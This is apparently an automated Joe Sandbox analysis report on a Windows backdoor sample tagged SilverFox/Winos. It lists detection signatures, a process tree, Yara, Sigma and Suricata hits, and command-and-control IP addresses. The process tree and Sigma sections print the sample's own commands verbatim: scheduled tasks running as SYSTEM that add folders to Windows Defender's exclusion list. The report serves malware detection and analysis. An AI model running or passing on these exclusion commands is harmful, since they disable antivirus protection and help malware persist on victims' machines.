Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
138745635-72645747.116.exe

Overview

General Information

Sample name:138745635-72645747.116.exe
Analysis ID:1591652
MD5:6da3af3e9ab312f971a0bc0171919175
SHA1:4248ea64734da5c581d0ee43c7a68914935dcd8a
SHA256:120a1ba5cfeff177fac2d353afbf765eccbd144ab5d743d8a3d6e722bc937714
Tags:backdoorexesilverfoxwinosuser-zhuzhu0009
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Adds extensions / path to Windows Defender exclusion list (Registry)
Creates an undocumented autostart registry key
Drops PE files to the document folder of the user
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for dropped file
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Switches to a custom stack to bypass stack traces
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to detect virtualization through RDTSC time measurements
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE
Sigma detected: Windows Defender Exclusions Added - Registry
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 138745635-72645747.116.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\138745635-72645747.116.exe" MD5: 6DA3AF3E9AB312F971A0BC0171919175)
  • 0b1G0H.exe (PID: 7732 cmdline: C:\Users\user\Documents\0b1G0H.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • 0b1G0H.exe (PID: 7752 cmdline: C:\Users\user\Documents\0b1G0H.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
    • cmd.exe (PID: 7884 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7936 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 7952 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 7984 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 8072 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 8116 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 8132 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 8164 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 2316 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 3168 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 5312 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 3624 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 5084 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 6044 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 7332 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6288 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • NEiV2V.exe (PID: 3300 cmdline: "C:\Program Files (x86)\NEiV2V\NEiV2V.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
      • cmd.exe (PID: 4088 cmdline: cmd /c echo.>c:\xxxx.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7968 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 8032 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 8148 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 908 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 480 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 980 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 6796 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 5664 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • NEiV2V.exe (PID: 1144 cmdline: "C:\Program Files (x86)\NEiV2V\NEiV2V.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • qH3CqQr.exe (PID: 7612 cmdline: "C:\Program Files (x86)\2I9luTPI\qH3CqQr.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • NEiV2V.exe (PID: 5900 cmdline: "C:\Program Files (x86)\NEiV2V\NEiV2V.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • qH3CqQr.exe (PID: 6452 cmdline: "C:\Program Files (x86)\2I9luTPI\qH3CqQr.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • NEiV2V.exe (PID: 6272 cmdline: "C:\Program Files (x86)\NEiV2V\NEiV2V.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • qH3CqQr.exe (PID: 6676 cmdline: "C:\Program Files (x86)\2I9luTPI\qH3CqQr.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • NEiV2V.exe (PID: 7704 cmdline: "C:\Program Files (x86)\NEiV2V\NEiV2V.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • qH3CqQr.exe (PID: 3484 cmdline: "C:\Program Files (x86)\2I9luTPI\qH3CqQr.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • NEiV2V.exe (PID: 8024 cmdline: "C:\Program Files (x86)\NEiV2V\NEiV2V.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • qH3CqQr.exe (PID: 8012 cmdline: "C:\Program Files (x86)\2I9luTPI\qH3CqQr.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Unpacked PEs

SourceRuleDescriptionAuthorStrings
4.2.0b1G0H.exe.28c0000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath

Sigma Signatures

System Summary

barindex
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\0b1G0H.exe, ParentImage: C:\Users\user\Documents\0b1G0H.exe, ParentProcessId: 7752, ParentProcessName: 0b1G0H.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 7884, ProcessName: cmd.exe
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\0b1G0H.exe, ParentImage: C:\Users\user\Documents\0b1G0H.exe, ParentProcessId: 7752, ParentProcessName: 0b1G0H.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 7884, ProcessName: cmd.exe
Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE
Source: Process startedAuthor: frack113: Data: Command: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7968, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ProcessId: 8032, ProcessName: reg.exe
Sigma detected: Windows Defender Exclusions Added - Registry
Source: Registry Key setAuthor: Christian Burkard (Nextron Systems): Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 8032, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-15T09:02:24.238892+010020283713Unknown Traffic192.168.2.44973039.103.20.17443TCP
2025-01-15T09:02:26.119657+010020283713Unknown Traffic192.168.2.44973139.103.20.17443TCP
2025-01-15T09:02:28.077156+010020283713Unknown Traffic192.168.2.44973239.103.20.17443TCP
2025-01-15T09:02:30.444095+010020283713Unknown Traffic192.168.2.44973839.103.20.17443TCP
2025-01-15T09:02:36.741487+010020283713Unknown Traffic192.168.2.44974039.103.20.17443TCP
2025-01-15T09:02:38.350198+010020283713Unknown Traffic192.168.2.44974139.103.20.17443TCP
2025-01-15T09:02:46.198704+010020283713Unknown Traffic192.168.2.44974239.103.20.17443TCP
2025-01-15T09:02:47.912210+010020283713Unknown Traffic192.168.2.44974339.103.20.17443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-15T09:03:43.489269+010028529011Malware Command and Control Activity Detected192.168.2.4500188.217.35.2538917TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for dropped file
Source: C:\Program Files (x86)\NEiV2V\tbcore3U.dllAvira: detection malicious, Label: TR/Redcap.vdzex
Source: C:\Program Files (x86)\2I9luTPI\tbcore3U.dllAvira: detection malicious, Label: TR/Redcap.vdzex
Multi AV Scanner detection for submitted file
Source: 138745635-72645747.116.exeVirustotal: Detection: 15%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\NEiV2V\tbcore3U.dllJoe Sandbox ML: detected
Source: C:\Program Files (x86)\2I9luTPI\tbcore3U.dllJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 39.103.20.17:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 39.103.20.17:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 39.103.20.17:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 39.103.20.17:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 39.103.20.17:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 39.103.20.17:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 39.103.20.17:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: NEiV2V.exe, 00000027.00000000.2641903584.0000000000988000.00000002.00000001.01000000.0000000A.sdmp, NEiV2V.exe, 00000028.00000002.2673184763.0000000000988000.00000002.00000001.01000000.0000000A.sdmp, NEiV2V.exe, 00000028.00000000.2663600373.0000000000988000.00000002.00000001.01000000.0000000A.sdmp, qH3CqQr.exe, 00000029.00000002.2676997061.0000000000B58000.00000002.00000001.01000000.0000000C.sdmp, qH3CqQr.exe, 00000029.00000000.2667844031.0000000000B58000.00000002.00000001.01000000.0000000C.sdmp, NEiV2V.exe, 0000002C.00000002.2689310539.0000000000988000.00000002.00000001.01000000.0000000A.sdmp, NEiV2V.exe, 0000002C.00000000.2680946419.0000000000988000.00000002.00000001.01000000.0000000A.sdmp, qH3CqQr.exe, 0000002D.00000002.2689022254.0000000000B58000.00000002.00000001.01000000.0000000C.sdmp, qH3CqQr.exe, 0000002D.00000000.2681647191.0000000000B58000.00000002.00000001.01000000.0000000C.sdmp, NEiV2V.exe, 0000002E.00000002.2884835002.0000000000988000.00000002.00000001.01000000.0000000A.sdmp, NEiV2V.exe, 0000002E.00000000.2874343841.0000000000988000.00000002.00000001.01000000.0000000A.sdmp, qH3CqQr.exe, 0000002F.00000000.2877870986.0000000000B58000.00000002.00000001.01000000.0000000C.sdmp, qH3CqQr.exe, 0000002F.00000002.2886408402.0000000000B58000.00000002.00000001.01000000.0000000C.sdmp, NEiV2V.exe, 00000030.00000000.3464124500.0000000000988000.00000002.00000001.01000000.0000000A.sdmp, NEiV2V.exe, 00000030.00000002.3482708412.0000000000988000.00000002.00000001.01000000.0000000A.sdmp, qH3CqQr.exe, 00000031.00000000.3472661139.0000000000B58000.00000002.00000001.01000000.0000000C.sdmp, qH3CqQr.exe, 00000031.00000002.3486320924.0000000000B58000.00000002.00000001.01000000.0000000C.sdmp, NEiV2V.exe, 00000032.00000002.4083518543.0000000000988000.00000002.00000001.01000000.0000000A.sdmp, NEiV2V.exe, 00000032.00000000.4064147355.0000000000988000.00000002.00000001.01000000.0000000A.sdmp, qH3CqQr.exe, 00000033.00000000.4070121540.0000000000B58000.00000002.00000001.01000000.0000000C.sdmp, qH3CqQr.exe, 00000033.00000002.4084684259.0000000000B58000.00000002.00000001.01000000.0000000C.sdmp, qH3CqQr.exe.39.dr, NEiV2V.exe.5.dr
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: 138745635-72645747.116.exe, 00000000.00000003.1948652367.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1945820735.0000000004568000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948284172.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948450518.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948686028.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948493114.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948248164.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948816630.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 138745635-72645747.116.exe, 00000000.00000003.1948090702.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 0b1G0H.exe, 00000004.00000000.2140059871.0000000140014000.00000002.00000001.01000000.00000007.sdmp, 0b1G0H.exe, 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmp, 0b1G0H.exe, 00000005.00000000.2156908507.0000000140014000.00000002.00000001.01000000.00000007.sdmp, 0b1G0H.exe.0.dr

Change of critical system settings

barindex
Adds extensions / path to Windows Defender exclusion list (Registry)
Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\ProgramDataJump to behavior
Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\UsersJump to behavior
Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Program Files (x86)Jump to behavior
Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\user\DocumentsJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Program Files (x86)\NEiV2V\NEiV2V.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
